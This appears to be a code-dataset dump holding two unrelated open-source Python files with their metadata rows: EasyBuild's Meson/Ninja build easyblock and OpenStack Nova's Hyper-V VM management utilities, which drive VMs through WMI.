repo_name
stringlengths 5
100
| path
stringlengths 4
299
| copies
stringclasses 990
values | size
stringlengths 4
7
| content
stringlengths 666
1.03M
| license
stringclasses 15
values | hash
int64 -9,223,351,895,964,839,000
9,223,297,778B
| line_mean
float64 3.17
100
| line_max
int64 7
1k
| alpha_frac
float64 0.25
0.98
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
akesandgren/easybuild-easyblocks | easybuild/easyblocks/generic/mesonninja.py | 2 | 4665 | ##
# Copyright 2018-2021 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# https://github.com/easybuilders/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for installing software with Meson & Ninja.
@author: Kenneth Hoste (Ghent University)
"""
from easybuild.framework.easyblock import EasyBlock
from easybuild.framework.easyconfig import CUSTOM
from easybuild.tools.build_log import EasyBuildError
from easybuild.tools.filetools import change_dir, create_unused_dir, which
from easybuild.tools.run import run_cmd
class MesonNinja(EasyBlock):
"""
Support for building and installing software with 'meson' and 'ninja'.
"""
@staticmethod
def extra_options(extra_vars=None):
"""Define extra easyconfig parameters specific to MesonNinja."""
extra_vars = EasyBlock.extra_options(extra_vars)
extra_vars.update({
'separate_build_dir': [True, "Perform build in a separate directory", CUSTOM],
})
return extra_vars
def configure_step(self, cmd_prefix=''):
"""
Configure with Meson.
"""
# make sure both Meson and Ninja are included as build dependencies
build_dep_names = [d['name'] for d in self.cfg.builddependencies()]
for tool in ['Ninja', 'Meson']:
if tool not in build_dep_names:
raise EasyBuildError("%s not included as build dependency", tool)
cmd = tool.lower()
if not which(cmd):
raise EasyBuildError("'%s' command not found", cmd)
if self.cfg.get('separate_build_dir', True):
builddir = create_unused_dir(self.builddir, 'easybuild_obj')
change_dir(builddir)
# Make sure libdir doesn't get set to lib/x86_64-linux-gnu or something
# on Debian/Ubuntu multiarch systems and others.
no_Dlibdir = '-Dlibdir' not in self.cfg['configopts']
no_libdir = '--libdir' not in self.cfg['configopts']
if no_Dlibdir and no_libdir:
self.cfg.update('configopts', '-Dlibdir=lib')
cmd = "%(preconfigopts)s meson --prefix %(installdir)s %(configopts)s %(sourcedir)s" % {
'configopts': self.cfg['configopts'],
'installdir': self.installdir,
'preconfigopts': self.cfg['preconfigopts'],
'sourcedir': self.start_dir,
}
(out, _) = run_cmd(cmd, log_all=True, simple=False)
return out
def build_step(self, verbose=False, path=None):
"""
Build with Ninja.
"""
parallel = ''
if self.cfg['parallel']:
parallel = "-j %s" % self.cfg['parallel']
cmd = "%(prebuildopts)s ninja %(parallel)s %(buildopts)s" % {
'buildopts': self.cfg['buildopts'],
'parallel': parallel,
'prebuildopts': self.cfg['prebuildopts'],
}
(out, _) = run_cmd(cmd, log_all=True, simple=False)
return out
def test_step(self):
"""
Run tests using Ninja.
"""
if self.cfg['runtest']:
cmd = "%s %s %s" % (self.cfg['pretestopts'], self.cfg['runtest'], self.cfg['testopts'])
(out, _) = run_cmd(cmd, log_all=True, simple=False)
return out
def install_step(self):
"""
Install with 'ninja install'.
"""
parallel = ''
if self.cfg['parallel']:
parallel = "-j %s" % self.cfg['parallel']
cmd = "%(preinstallopts)s ninja %(parallel)s %(installopts)s install" % {
'installopts': self.cfg['installopts'],
'parallel': parallel,
'preinstallopts': self.cfg['preinstallopts'],
}
(out, _) = run_cmd(cmd, log_all=True, simple=False)
return out
| gpl-2.0 | -8,218,191,165,245,638,000 | 36.620968 | 99 | 0.621008 | false |
nikesh-mahalka/nova | nova/virt/hyperv/vmutils.py | 5 | 35501 | # Copyright (c) 2010 Cloud.com, Inc
# Copyright 2012 Cloudbase Solutions Srl / Pedro Navarro Perez
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Utility class for VM related operations on Hyper-V.
"""
import sys
import time
import uuid
if sys.platform == 'win32':
import wmi
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import uuidutils
import six
from six.moves import range
from nova import exception
from nova.i18n import _, _LW
from nova.virt.hyperv import constants
from nova.virt.hyperv import hostutils
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
# TODO(alexpilotti): Move the exceptions to a separate module
# TODO(alexpilotti): Add more domain exceptions
class HyperVException(exception.NovaException):
def __init__(self, message=None):
super(HyperVException, self).__init__(message)
# TODO(alexpilotti): Add a storage exception base class
class VHDResizeException(HyperVException):
def __init__(self, message=None):
super(HyperVException, self).__init__(message)
class HyperVAuthorizationException(HyperVException):
def __init__(self, message=None):
super(HyperVException, self).__init__(message)
class UnsupportedConfigDriveFormatException(HyperVException):
def __init__(self, message=None):
super(HyperVException, self).__init__(message)
class VMUtils(object):
# These constants can be overridden by inherited classes
_PHYS_DISK_RES_SUB_TYPE = 'Microsoft Physical Disk Drive'
_DISK_DRIVE_RES_SUB_TYPE = 'Microsoft Synthetic Disk Drive'
_DVD_DRIVE_RES_SUB_TYPE = 'Microsoft Synthetic DVD Drive'
_HARD_DISK_RES_SUB_TYPE = 'Microsoft Virtual Hard Disk'
_DVD_DISK_RES_SUB_TYPE = 'Microsoft Virtual CD/DVD Disk'
_IDE_CTRL_RES_SUB_TYPE = 'Microsoft Emulated IDE Controller'
_SCSI_CTRL_RES_SUB_TYPE = 'Microsoft Synthetic SCSI Controller'
_SERIAL_PORT_RES_SUB_TYPE = 'Microsoft Serial Port'
_SETTINGS_DEFINE_STATE_CLASS = 'Msvm_SettingsDefineState'
_VIRTUAL_SYSTEM_SETTING_DATA_CLASS = 'Msvm_VirtualSystemSettingData'
_RESOURCE_ALLOC_SETTING_DATA_CLASS = 'Msvm_ResourceAllocationSettingData'
_PROCESSOR_SETTING_DATA_CLASS = 'Msvm_ProcessorSettingData'
_MEMORY_SETTING_DATA_CLASS = 'Msvm_MemorySettingData'
_SERIAL_PORT_SETTING_DATA_CLASS = _RESOURCE_ALLOC_SETTING_DATA_CLASS
_STORAGE_ALLOC_SETTING_DATA_CLASS = _RESOURCE_ALLOC_SETTING_DATA_CLASS
_SYNTHETIC_ETHERNET_PORT_SETTING_DATA_CLASS = \
'Msvm_SyntheticEthernetPortSettingData'
_AFFECTED_JOB_ELEMENT_CLASS = "Msvm_AffectedJobElement"
_COMPUTER_SYSTEM_CLASS = "Msvm_ComputerSystem"
_VM_ENABLED_STATE_PROP = "EnabledState"
_SHUTDOWN_COMPONENT = "Msvm_ShutdownComponent"
_VIRTUAL_SYSTEM_CURRENT_SETTINGS = 3
_AUTOMATIC_STARTUP_ACTION_NONE = 0
_PHYS_DISK_CONNECTION_ATTR = "HostResource"
_VIRT_DISK_CONNECTION_ATTR = "Connection"
_vm_power_states_map = {constants.HYPERV_VM_STATE_ENABLED: 2,
constants.HYPERV_VM_STATE_DISABLED: 3,
constants.HYPERV_VM_STATE_SHUTTING_DOWN: 4,
constants.HYPERV_VM_STATE_REBOOT: 10,
constants.HYPERV_VM_STATE_PAUSED: 32768,
constants.HYPERV_VM_STATE_SUSPENDED: 32769}
def __init__(self, host='.'):
self._enabled_states_map = {v: k for k, v in
six.iteritems(self._vm_power_states_map)}
if sys.platform == 'win32':
self._init_hyperv_wmi_conn(host)
self._conn_cimv2 = wmi.WMI(moniker='//%s/root/cimv2' % host)
# On version of Hyper-V prior to 2012 trying to directly set properties
# in default setting data WMI objects results in an exception
self._clone_wmi_objs = False
if sys.platform == 'win32':
hostutls = hostutils.HostUtils()
self._clone_wmi_objs = not hostutls.check_min_windows_version(6, 2)
def _init_hyperv_wmi_conn(self, host):
self._conn = wmi.WMI(moniker='//%s/root/virtualization' % host)
def list_instance_notes(self):
instance_notes = []
for vs in self._conn.Msvm_VirtualSystemSettingData(
['ElementName', 'Notes'],
SettingType=self._VIRTUAL_SYSTEM_CURRENT_SETTINGS):
if vs.Notes is not None:
instance_notes.append(
(vs.ElementName, [v for v in vs.Notes.split('\n') if v]))
return instance_notes
def list_instances(self):
"""Return the names of all the instances known to Hyper-V."""
return [v.ElementName for v in
self._conn.Msvm_VirtualSystemSettingData(
['ElementName'],
SettingType=self._VIRTUAL_SYSTEM_CURRENT_SETTINGS)]
def get_vm_summary_info(self, vm_name):
vm = self._lookup_vm_check(vm_name)
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
vmsettings = vm.associators(
wmi_association_class=self._SETTINGS_DEFINE_STATE_CLASS,
wmi_result_class=self._VIRTUAL_SYSTEM_SETTING_DATA_CLASS)
settings_paths = [v.path_() for v in vmsettings]
# See http://msdn.microsoft.com/en-us/library/cc160706%28VS.85%29.aspx
(ret_val, summary_info) = vs_man_svc.GetSummaryInformation(
[constants.VM_SUMMARY_NUM_PROCS,
constants.VM_SUMMARY_ENABLED_STATE,
constants.VM_SUMMARY_MEMORY_USAGE,
constants.VM_SUMMARY_UPTIME],
settings_paths)
if ret_val:
raise HyperVException(_('Cannot get VM summary data for: %s')
% vm_name)
si = summary_info[0]
memory_usage = None
if si.MemoryUsage is not None:
memory_usage = long(si.MemoryUsage)
up_time = None
if si.UpTime is not None:
up_time = long(si.UpTime)
# Nova requires a valid state to be returned. Hyper-V has more
# states than Nova, typically intermediate ones and since there is
# no direct mapping for those, ENABLED is the only reasonable option
# considering that in all the non mappable states the instance
# is running.
enabled_state = self._enabled_states_map.get(si.EnabledState,
constants.HYPERV_VM_STATE_ENABLED)
summary_info_dict = {'NumberOfProcessors': si.NumberOfProcessors,
'EnabledState': enabled_state,
'MemoryUsage': memory_usage,
'UpTime': up_time}
return summary_info_dict
def _lookup_vm_check(self, vm_name):
vm = self._lookup_vm(vm_name)
if not vm:
raise exception.NotFound(_('VM not found: %s') % vm_name)
return vm
def _lookup_vm(self, vm_name):
vms = self._conn.Msvm_ComputerSystem(ElementName=vm_name)
n = len(vms)
if n == 0:
return None
elif n > 1:
raise HyperVException(_('Duplicate VM name found: %s') % vm_name)
else:
return vms[0]
def vm_exists(self, vm_name):
return self._lookup_vm(vm_name) is not None
def get_vm_id(self, vm_name):
vm = self._lookup_vm_check(vm_name)
return vm.Name
def _get_vm_setting_data(self, vm):
vmsettings = vm.associators(
wmi_result_class=self._VIRTUAL_SYSTEM_SETTING_DATA_CLASS)
# Avoid snapshots
return [s for s in vmsettings if s.SettingType == 3][0]
def _set_vm_memory(self, vm, vmsetting, memory_mb, dynamic_memory_ratio):
mem_settings = vmsetting.associators(
wmi_result_class=self._MEMORY_SETTING_DATA_CLASS)[0]
max_mem = long(memory_mb)
mem_settings.Limit = max_mem
if dynamic_memory_ratio > 1:
mem_settings.DynamicMemoryEnabled = True
# Must be a multiple of 2
reserved_mem = min(
long(max_mem / dynamic_memory_ratio) >> 1 << 1,
max_mem)
else:
mem_settings.DynamicMemoryEnabled = False
reserved_mem = max_mem
mem_settings.Reservation = reserved_mem
# Start with the minimum memory
mem_settings.VirtualQuantity = reserved_mem
self._modify_virt_resource(mem_settings, vm.path_())
def _set_vm_vcpus(self, vm, vmsetting, vcpus_num, limit_cpu_features):
procsetting = vmsetting.associators(
wmi_result_class=self._PROCESSOR_SETTING_DATA_CLASS)[0]
vcpus = long(vcpus_num)
procsetting.VirtualQuantity = vcpus
procsetting.Reservation = vcpus
procsetting.Limit = 100000 # static assignment to 100%
procsetting.LimitProcessorFeatures = limit_cpu_features
self._modify_virt_resource(procsetting, vm.path_())
def update_vm(self, vm_name, memory_mb, vcpus_num, limit_cpu_features,
dynamic_memory_ratio):
vm = self._lookup_vm_check(vm_name)
vmsetting = self._get_vm_setting_data(vm)
self._set_vm_memory(vm, vmsetting, memory_mb, dynamic_memory_ratio)
self._set_vm_vcpus(vm, vmsetting, vcpus_num, limit_cpu_features)
def check_admin_permissions(self):
if not self._conn.Msvm_VirtualSystemManagementService():
msg = _("The Windows account running nova-compute on this Hyper-V"
" host doesn't have the required permissions to create or"
" operate the virtual machine.")
raise HyperVAuthorizationException(msg)
def create_vm(self, vm_name, memory_mb, vcpus_num, limit_cpu_features,
dynamic_memory_ratio, vm_gen, instance_path, notes=None):
"""Creates a VM."""
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
LOG.debug('Creating VM %s', vm_name)
vm = self._create_vm_obj(vs_man_svc, vm_name, vm_gen, notes,
dynamic_memory_ratio, instance_path)
vmsetting = self._get_vm_setting_data(vm)
LOG.debug('Setting memory for vm %s', vm_name)
self._set_vm_memory(vm, vmsetting, memory_mb, dynamic_memory_ratio)
LOG.debug('Set vCPUs for vm %s', vm_name)
self._set_vm_vcpus(vm, vmsetting, vcpus_num, limit_cpu_features)
def _create_vm_obj(self, vs_man_svc, vm_name, vm_gen, notes,
dynamic_memory_ratio, instance_path):
vs_gs_data = self._conn.Msvm_VirtualSystemGlobalSettingData.new()
vs_gs_data.ElementName = vm_name
# Don't start automatically on host boot
vs_gs_data.AutomaticStartupAction = self._AUTOMATIC_STARTUP_ACTION_NONE
vs_gs_data.ExternalDataRoot = instance_path
vs_gs_data.SnapshotDataRoot = instance_path
(vm_path,
job_path,
ret_val) = vs_man_svc.DefineVirtualSystem([], None,
vs_gs_data.GetText_(1))
self.check_ret_val(ret_val, job_path)
vm = self._get_wmi_obj(vm_path)
if notes:
vmsetting = self._get_vm_setting_data(vm)
vmsetting.Notes = '\n'.join(notes)
self._modify_virtual_system(vs_man_svc, vm_path, vmsetting)
return self._get_wmi_obj(vm_path)
def _modify_virtual_system(self, vs_man_svc, vm_path, vmsetting):
(job_path, ret_val) = vs_man_svc.ModifyVirtualSystem(
ComputerSystem=vm_path,
SystemSettingData=vmsetting.GetText_(1))[1:]
self.check_ret_val(ret_val, job_path)
def get_vm_scsi_controller(self, vm_name):
vm = self._lookup_vm_check(vm_name)
return self._get_vm_scsi_controller(vm)
def _get_vm_scsi_controller(self, vm):
vmsettings = vm.associators(
wmi_result_class=self._VIRTUAL_SYSTEM_SETTING_DATA_CLASS)
rasds = vmsettings[0].associators(
wmi_result_class=self._RESOURCE_ALLOC_SETTING_DATA_CLASS)
res = [r for r in rasds
if r.ResourceSubType == self._SCSI_CTRL_RES_SUB_TYPE][0]
return res.path_()
def _get_vm_ide_controller(self, vm, ctrller_addr):
vmsettings = vm.associators(
wmi_result_class=self._VIRTUAL_SYSTEM_SETTING_DATA_CLASS)
rasds = vmsettings[0].associators(
wmi_result_class=self._RESOURCE_ALLOC_SETTING_DATA_CLASS)
ide_ctrls = [r for r in rasds
if r.ResourceSubType == self._IDE_CTRL_RES_SUB_TYPE
and r.Address == str(ctrller_addr)]
return ide_ctrls[0].path_() if ide_ctrls else None
def get_vm_ide_controller(self, vm_name, ctrller_addr):
vm = self._lookup_vm_check(vm_name)
return self._get_vm_ide_controller(vm, ctrller_addr)
def get_attached_disks(self, scsi_controller_path):
volumes = self._conn.query(
self._get_attached_disks_query_string(scsi_controller_path))
return volumes
def _get_attached_disks_query_string(self, scsi_controller_path):
return ("SELECT * FROM %(class_name)s WHERE ("
"ResourceSubType='%(res_sub_type)s' OR "
"ResourceSubType='%(res_sub_type_virt)s') AND "
"Parent='%(parent)s'" % {
'class_name': self._RESOURCE_ALLOC_SETTING_DATA_CLASS,
'res_sub_type': self._PHYS_DISK_RES_SUB_TYPE,
'res_sub_type_virt': self._DISK_DRIVE_RES_SUB_TYPE,
'parent': scsi_controller_path.replace("'", "''")})
def _get_new_setting_data(self, class_name):
obj = self._conn.query("SELECT * FROM %s WHERE InstanceID "
"LIKE '%%\\Default'" % class_name)[0]
return self._check_clone_wmi_obj(class_name, obj)
def _get_new_resource_setting_data(self, resource_sub_type,
class_name=None):
if class_name is None:
class_name = self._RESOURCE_ALLOC_SETTING_DATA_CLASS
obj = self._conn.query("SELECT * FROM %(class_name)s "
"WHERE ResourceSubType = "
"'%(res_sub_type)s' AND "
"InstanceID LIKE '%%\\Default'" %
{"class_name": class_name,
"res_sub_type": resource_sub_type})[0]
return self._check_clone_wmi_obj(class_name, obj)
def _check_clone_wmi_obj(self, class_name, obj):
if self._clone_wmi_objs:
return self._clone_wmi_obj(class_name, obj)
else:
return obj
def _clone_wmi_obj(self, class_name, obj):
wmi_class = getattr(self._conn, class_name)
new_obj = wmi_class.new()
# Copy the properties from the original.
for prop in obj._properties:
value = obj.Properties_.Item(prop).Value
new_obj.Properties_.Item(prop).Value = value
return new_obj
def attach_scsi_drive(self, vm_name, path, drive_type=constants.DISK):
vm = self._lookup_vm_check(vm_name)
ctrller_path = self._get_vm_scsi_controller(vm)
drive_addr = self.get_free_controller_slot(ctrller_path)
self.attach_drive(vm_name, path, ctrller_path, drive_addr, drive_type)
def attach_ide_drive(self, vm_name, path, ctrller_addr, drive_addr,
drive_type=constants.DISK):
vm = self._lookup_vm_check(vm_name)
ctrller_path = self._get_vm_ide_controller(vm, ctrller_addr)
self.attach_drive(vm_name, path, ctrller_path, drive_addr, drive_type)
def attach_drive(self, vm_name, path, ctrller_path, drive_addr,
drive_type=constants.DISK):
"""Create a drive and attach it to the vm."""
vm = self._lookup_vm_check(vm_name)
if drive_type == constants.DISK:
res_sub_type = self._DISK_DRIVE_RES_SUB_TYPE
elif drive_type == constants.DVD:
res_sub_type = self._DVD_DRIVE_RES_SUB_TYPE
drive = self._get_new_resource_setting_data(res_sub_type)
# Set the ctrller as parent.
drive.Parent = ctrller_path
drive.Address = drive_addr
# Add the cloned disk drive object to the vm.
new_resources = self._add_virt_resource(drive, vm.path_())
drive_path = new_resources[0]
if drive_type == constants.DISK:
res_sub_type = self._HARD_DISK_RES_SUB_TYPE
elif drive_type == constants.DVD:
res_sub_type = self._DVD_DISK_RES_SUB_TYPE
res = self._get_new_resource_setting_data(res_sub_type)
# Set the new drive as the parent.
res.Parent = drive_path
res.Connection = [path]
# Add the new vhd object as a virtual hard disk to the vm.
self._add_virt_resource(res, vm.path_())
def create_scsi_controller(self, vm_name):
"""Create an iscsi controller ready to mount volumes."""
vm = self._lookup_vm_check(vm_name)
scsicontrl = self._get_new_resource_setting_data(
self._SCSI_CTRL_RES_SUB_TYPE)
scsicontrl.VirtualSystemIdentifiers = ['{' + str(uuid.uuid4()) + '}']
self._add_virt_resource(scsicontrl, vm.path_())
def attach_volume_to_controller(self, vm_name, controller_path, address,
mounted_disk_path):
"""Attach a volume to a controller."""
vm = self._lookup_vm_check(vm_name)
diskdrive = self._get_new_resource_setting_data(
self._PHYS_DISK_RES_SUB_TYPE)
diskdrive.Address = address
diskdrive.Parent = controller_path
diskdrive.HostResource = [mounted_disk_path]
self._add_virt_resource(diskdrive, vm.path_())
def _get_disk_resource_address(self, disk_resource):
return disk_resource.Address
def set_disk_host_resource(self, vm_name, controller_path, address,
mounted_disk_path):
disk_found = False
vm = self._lookup_vm_check(vm_name)
(disk_resources, volume_resources) = self._get_vm_disks(vm)
for disk_resource in disk_resources + volume_resources:
if (disk_resource.Parent == controller_path and
self._get_disk_resource_address(disk_resource) ==
str(address)):
if (disk_resource.HostResource and
disk_resource.HostResource[0] != mounted_disk_path):
LOG.debug('Updating disk host resource "%(old)s" to '
'"%(new)s"' %
{'old': disk_resource.HostResource[0],
'new': mounted_disk_path})
disk_resource.HostResource = [mounted_disk_path]
self._modify_virt_resource(disk_resource, vm.path_())
disk_found = True
break
if not disk_found:
LOG.warning(_LW('Disk not found on controller '
'"%(controller_path)s" with '
'address "%(address)s"'),
{'controller_path': controller_path,
'address': address})
def set_nic_connection(self, vm_name, nic_name, vswitch_conn_data):
nic_data = self._get_nic_data_by_name(nic_name)
nic_data.Connection = [vswitch_conn_data]
vm = self._lookup_vm_check(vm_name)
self._modify_virt_resource(nic_data, vm.path_())
def _get_nic_data_by_name(self, name):
return self._conn.Msvm_SyntheticEthernetPortSettingData(
ElementName=name)[0]
def create_nic(self, vm_name, nic_name, mac_address):
"""Create a (synthetic) nic and attach it to the vm."""
# Create a new nic
new_nic_data = self._get_new_setting_data(
self._SYNTHETIC_ETHERNET_PORT_SETTING_DATA_CLASS)
# Configure the nic
new_nic_data.ElementName = nic_name
new_nic_data.Address = mac_address.replace(':', '')
new_nic_data.StaticMacAddress = 'True'
new_nic_data.VirtualSystemIdentifiers = ['{' + str(uuid.uuid4()) + '}']
# Add the new nic to the vm
vm = self._lookup_vm_check(vm_name)
self._add_virt_resource(new_nic_data, vm.path_())
def soft_shutdown_vm(self, vm_name):
vm = self._lookup_vm_check(vm_name)
shutdown_component = vm.associators(
wmi_result_class=self._SHUTDOWN_COMPONENT)
if not shutdown_component:
# If no shutdown_component is found, it means the VM is already
# in a shutdown state.
return
reason = 'Soft shutdown requested by OpenStack Nova.'
(ret_val, ) = shutdown_component[0].InitiateShutdown(Force=False,
Reason=reason)
self.check_ret_val(ret_val, None)
def set_vm_state(self, vm_name, req_state):
"""Set the desired state of the VM."""
vm = self._lookup_vm_check(vm_name)
(job_path,
ret_val) = vm.RequestStateChange(self._vm_power_states_map[req_state])
# Invalid state for current operation (32775) typically means that
# the VM is already in the state requested
self.check_ret_val(ret_val, job_path, [0, 32775])
LOG.debug("Successfully changed vm state of %(vm_name)s "
"to %(req_state)s",
{'vm_name': vm_name, 'req_state': req_state})
def _get_disk_resource_disk_path(self, disk_resource):
return disk_resource.Connection
def get_vm_storage_paths(self, vm_name):
vm = self._lookup_vm_check(vm_name)
(disk_resources, volume_resources) = self._get_vm_disks(vm)
volume_drives = []
for volume_resource in volume_resources:
drive_path = volume_resource.HostResource[0]
volume_drives.append(drive_path)
disk_files = []
for disk_resource in disk_resources:
disk_files.extend(
[c for c in self._get_disk_resource_disk_path(disk_resource)])
return (disk_files, volume_drives)
def _get_vm_disks(self, vm):
vmsettings = vm.associators(
wmi_result_class=self._VIRTUAL_SYSTEM_SETTING_DATA_CLASS)
rasds = vmsettings[0].associators(
wmi_result_class=self._STORAGE_ALLOC_SETTING_DATA_CLASS)
disk_resources = [r for r in rasds if
r.ResourceSubType in
[self._HARD_DISK_RES_SUB_TYPE,
self._DVD_DISK_RES_SUB_TYPE]]
if (self._RESOURCE_ALLOC_SETTING_DATA_CLASS !=
self._STORAGE_ALLOC_SETTING_DATA_CLASS):
rasds = vmsettings[0].associators(
wmi_result_class=self._RESOURCE_ALLOC_SETTING_DATA_CLASS)
volume_resources = [r for r in rasds if
r.ResourceSubType == self._PHYS_DISK_RES_SUB_TYPE]
return (disk_resources, volume_resources)
def destroy_vm(self, vm_name):
vm = self._lookup_vm_check(vm_name)
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
# Remove the VM. Does not destroy disks.
(job_path, ret_val) = vs_man_svc.DestroyVirtualSystem(vm.path_())
self.check_ret_val(ret_val, job_path)
def check_ret_val(self, ret_val, job_path, success_values=[0]):
if ret_val == constants.WMI_JOB_STATUS_STARTED:
return self._wait_for_job(job_path)
elif ret_val not in success_values:
raise HyperVException(_('Operation failed with return value: %s')
% ret_val)
def _wait_for_job(self, job_path):
"""Poll WMI job state and wait for completion."""
job = self._get_wmi_obj(job_path)
while job.JobState == constants.WMI_JOB_STATE_RUNNING:
time.sleep(0.1)
job = self._get_wmi_obj(job_path)
if job.JobState != constants.WMI_JOB_STATE_COMPLETED:
job_state = job.JobState
if job.path().Class == "Msvm_ConcreteJob":
err_sum_desc = job.ErrorSummaryDescription
err_desc = job.ErrorDescription
err_code = job.ErrorCode
raise HyperVException(_("WMI job failed with status "
"%(job_state)d. Error details: "
"%(err_sum_desc)s - %(err_desc)s - "
"Error code: %(err_code)d") %
{'job_state': job_state,
'err_sum_desc': err_sum_desc,
'err_desc': err_desc,
'err_code': err_code})
else:
(error, ret_val) = job.GetError()
if not ret_val and error:
raise HyperVException(_("WMI job failed with status "
"%(job_state)d. Error details: "
"%(error)s") %
{'job_state': job_state,
'error': error})
else:
raise HyperVException(_("WMI job failed with status "
"%d. No error "
"description available") %
job_state)
desc = job.Description
elap = job.ElapsedTime
LOG.debug("WMI job succeeded: %(desc)s, Elapsed=%(elap)s",
{'desc': desc, 'elap': elap})
return job
def _get_wmi_obj(self, path):
return wmi.WMI(moniker=path.replace('\\', '/'))
def _add_virt_resource(self, res_setting_data, vm_path):
"""Adds a new resource to the VM."""
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
res_xml = [res_setting_data.GetText_(1)]
(job_path,
new_resources,
ret_val) = vs_man_svc.AddVirtualSystemResources(res_xml, vm_path)
self.check_ret_val(ret_val, job_path)
return new_resources
def _modify_virt_resource(self, res_setting_data, vm_path):
"""Updates a VM resource."""
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
(job_path, ret_val) = vs_man_svc.ModifyVirtualSystemResources(
ResourceSettingData=[res_setting_data.GetText_(1)],
ComputerSystem=vm_path)
self.check_ret_val(ret_val, job_path)
def _remove_virt_resource(self, res_setting_data, vm_path):
"""Removes a VM resource."""
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
res_path = [res_setting_data.path_()]
(job_path, ret_val) = vs_man_svc.RemoveVirtualSystemResources(res_path,
vm_path)
self.check_ret_val(ret_val, job_path)
def take_vm_snapshot(self, vm_name):
vm = self._lookup_vm_check(vm_name)
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
(job_path, ret_val,
snp_setting_data) = vs_man_svc.CreateVirtualSystemSnapshot(vm.path_())
self.check_ret_val(ret_val, job_path)
job_wmi_path = job_path.replace('\\', '/')
job = wmi.WMI(moniker=job_wmi_path)
snp_setting_data = job.associators(
wmi_result_class=self._VIRTUAL_SYSTEM_SETTING_DATA_CLASS)[0]
return snp_setting_data.path_()
def remove_vm_snapshot(self, snapshot_path):
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
(job_path, ret_val) = vs_man_svc.RemoveVirtualSystemSnapshot(
snapshot_path)
self.check_ret_val(ret_val, job_path)
def detach_vm_disk(self, vm_name, disk_path, is_physical=True):
vm = self._lookup_vm_check(vm_name)
disk_resource = self._get_mounted_disk_resource_from_path(disk_path,
is_physical)
if disk_resource:
parent = self._conn.query("SELECT * FROM "
"Msvm_ResourceAllocationSettingData "
"WHERE __PATH = '%s'" %
disk_resource.Parent)[0]
self._remove_virt_resource(disk_resource, vm.path_())
if not is_physical:
self._remove_virt_resource(parent, vm.path_())
def _get_mounted_disk_resource_from_path(self, disk_path, is_physical):
if is_physical:
class_name = self._RESOURCE_ALLOC_SETTING_DATA_CLASS
res_sub_type = self._PHYS_DISK_RES_SUB_TYPE
conn_attr = self._PHYS_DISK_CONNECTION_ATTR
else:
class_name = self._STORAGE_ALLOC_SETTING_DATA_CLASS
res_sub_type = self._HARD_DISK_RES_SUB_TYPE
conn_attr = self._VIRT_DISK_CONNECTION_ATTR
disk_resources = self._conn.query("SELECT * FROM %(class_name)s "
"WHERE ResourceSubType = "
"'%(res_sub_type)s'" %
{"class_name": class_name,
"res_sub_type": res_sub_type})
for disk_resource in disk_resources:
conn = getattr(disk_resource, conn_attr, None)
if conn and conn[0].lower() == disk_path.lower():
return disk_resource
def get_mounted_disk_by_drive_number(self, device_number):
mounted_disks = self._conn.query("SELECT * FROM Msvm_DiskDrive "
"WHERE DriveNumber=" +
str(device_number))
if len(mounted_disks):
return mounted_disks[0].path_()
def get_controller_volume_paths(self, controller_path):
disks = self._conn.query("SELECT * FROM %(class_name)s "
"WHERE ResourceSubType = '%(res_sub_type)s' "
"AND Parent='%(parent)s'" %
{"class_name":
self._RESOURCE_ALLOC_SETTING_DATA_CLASS,
"res_sub_type":
self._PHYS_DISK_RES_SUB_TYPE,
"parent":
controller_path})
disk_data = {}
for disk in disks:
if disk.HostResource:
disk_data[disk.path().RelPath] = disk.HostResource[0]
return disk_data
def get_free_controller_slot(self, scsi_controller_path):
attached_disks = self.get_attached_disks(scsi_controller_path)
used_slots = [int(self._get_disk_resource_address(disk))
for disk in attached_disks]
for slot in range(constants.SCSI_CONTROLLER_SLOTS_NUMBER):
if slot not in used_slots:
return slot
raise HyperVException(_("Exceeded the maximum number of slots"))
def enable_vm_metrics_collection(self, vm_name):
raise NotImplementedError(_("Metrics collection is not supported on "
"this version of Hyper-V"))
def get_vm_serial_port_connection(self, vm_name, update_connection=None):
vm = self._lookup_vm_check(vm_name)
vmsettings = vm.associators(
wmi_result_class=self._VIRTUAL_SYSTEM_SETTING_DATA_CLASS)
rasds = vmsettings[0].associators(
wmi_result_class=self._SERIAL_PORT_SETTING_DATA_CLASS)
serial_port = (
[r for r in rasds if
r.ResourceSubType == self._SERIAL_PORT_RES_SUB_TYPE][0])
if update_connection:
serial_port.Connection = [update_connection]
self._modify_virt_resource(serial_port, vm.path_())
if len(serial_port.Connection) > 0:
return serial_port.Connection[0]
def get_active_instances(self):
"""Return the names of all the active instances known to Hyper-V."""
vm_names = self.list_instances()
vms = [self._lookup_vm(vm_name) for vm_name in vm_names]
active_vm_names = [v.ElementName for v in vms
if v.EnabledState == constants.HYPERV_VM_STATE_ENABLED]
return active_vm_names
